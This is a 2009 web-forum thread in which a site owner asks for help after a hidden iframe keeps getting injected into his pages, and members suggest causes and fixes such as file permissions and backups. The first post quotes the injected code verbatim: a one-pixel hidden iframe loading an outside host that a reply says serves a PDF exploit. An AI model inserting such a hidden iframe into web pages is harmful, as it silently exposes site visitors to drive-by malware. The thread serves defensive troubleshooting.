1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Help me!Somethig weird is happening to my website

Discussion in 'White Hat SEO' started by thesmashge, Apr 9, 2009.

  1. thesmashge

    thesmashge Power Member

    Joined:
    Jan 14, 2009
    Messages:
    520
    Likes Received:
    519
    I have this site getting 400 visitors daily earning me 400$ per month.It's the only source of income i have....

    Everything went alright until today...

    When visitors Type my sitename in the browser or go to my site through google the following site also gets opened

    Code:
    hxxp://xtrarobotz.com/p1d2f3.php?id=52263&vis=1
    It's more like a pdf blank document opening than a site....

    When i check my site HTML...i find this code attached below after my code ends...

    Code:
    </body></html><iframe src="http://xtrarobotz.com/?click=5353E8" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
    I tried removing it....But this code keeps on comming and gives problems to my site.....I am fast loosing visitors.

    What is this?a Virus?Somebody pls help me with this.I beleive in the knowledge of BHW than any other technical forum....That's why i am asking help here....Pls reply.
     
  2. Bertik

    Bertik Newbie

    Joined:
    Apr 29, 2008
    Messages:
    30
    Likes Received:
    1
    Sounds like SQL injection. Look in the SQL for xtrarobotz and delete the entry......
     
  3. stealthisblog

    stealthisblog Regular Member

    Joined:
    May 26, 2008
    Messages:
    289
    Likes Received:
    238
    Location:
    New York City
    im guessing you dont know what sql injection is. SQL Injection is taking advantage of unfiltered input on the person's website to alter and retrieve database information. How can you say its sql injection when he didn't even post a link to his site... Thats just a hidden iframe with what I believe is a pdf exploit to help whoever hacked this guy to expand his botnet.

    someone has hacked your site and is putting that into your source. They could be doing it in so many different ways. Gimme the link to your site and I'll see if I can find how they're doing it.
     
  4. andyred

    andyred Junior Member

    Joined:
    Oct 17, 2007
    Messages:
    137
    Likes Received:
    16
    yep...plain php injection in index.php
     
  5. Bertik

    Bertik Newbie

    Joined:
    Apr 29, 2008
    Messages:
    30
    Likes Received:
    1
    Well, last time (like 2 years ago), my site was hacked over the SQL as far as I remember. I was looking how they keep including the link in the code over and over and it turned out to be in one table in the SQL....
    And I remember that the link looked ''exactly'' the same.
    That's why I assume that his problem is like mine 2 years ago.
    Just trying to help, no hard feelings.
     
  6. thesmashge

    thesmashge Power Member

    Joined:
    Jan 14, 2009
    Messages:
    520
    Likes Received:
    519
    I don't have any sql in my site......All i have is just a sales page.....and in another folder i have installed Drupal which needs a mysql DB.

    Can any of you tell me what to do to end this problem.I will be very thankfull to you ....
     
  7. ukescuba

    ukescuba Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 24, 2008
    Messages:
    994
    Likes Received:
    634
    Occupation:
    Mobile Marketer & QR Code Junkie
    Location:
    San Antonio, TX
    Home Page:
    im not familiar with drupal but take if its similar to joomla and the likes, take a look at the template files that generates your page, chances are the code will be at the bottom of your template code

    once you have removed the offending code - check using ftp software what your chmod settings are for the folder/file chances are you have it set to 777 if thats the case change it to 644
     
    • Thanks Thanks x 1
    Last edited: Apr 9, 2009
  8. thesmashge

    thesmashge Power Member

    Joined:
    Jan 14, 2009
    Messages:
    520
    Likes Received:
    519
    I am not on free hosting....And i tried removing the code...but it kept back comming....

    I have overcome the problem for now i guess.....I removed the code....then deleted all mysql db's .....deleted drupal.....deleted all subdirectories.....Since my site has just one sales page and a thank-you page i deleted everythig except them.

    When i slept and woke up i am not getting the Problem now....Hope the nightmare is over.

    I just wonder how i would have handled this if i had a bigger site with thousands of pages of content built with hard work?and kid injects something and all my money dissappears and google gets me banned......

    Any precautions i should follow?
     
  9. dropzone

    dropzone Registered Member

    Joined:
    Nov 3, 2008
    Messages:
    60
    Likes Received:
    44
    Google >>> Backtrack

    It's a Slax-based Linux distribution with a collection of over 300 security and forensics tools.

    Use can use it to see where your holes are.
     
  10. blackhat+er

    blackhat+er Regular Member

    Joined:
    Feb 19, 2009
    Messages:
    217
    Likes Received:
    150
    Ya see thats fine and dandy that you got rid of all of your other files but you might not need to. If you would have read what was written about changing your cmmod to 644 then chances are you would be ok. The reason being is that 777 i bet is or was your current settings and that means that file writable by anyone basically which means someone can do that and much worse to you so change it if it continues i would look at getting better hosting step it up a bit and you will be more secure if you go with a good company.

    cheers
     
  11. the_punisher

    the_punisher Power Member

    Joined:
    Feb 6, 2008
    Messages:
    506
    Likes Received:
    115
    i had that problem once. i have a huge site with around 6000 pages.

    last year when some one clicked on my link they would get redirected to a russian porn site. :/

    all i did was contact my host and told them to delete this current shit and do a full backup restore from one of my weekly backups
     
  12. blackhat+er

    blackhat+er Regular Member

    Joined:
    Feb 19, 2009
    Messages:
    217
    Likes Received:
    150
    ya thats a quick good fix indeed wasnt really thinking that simple :rolleyes: lol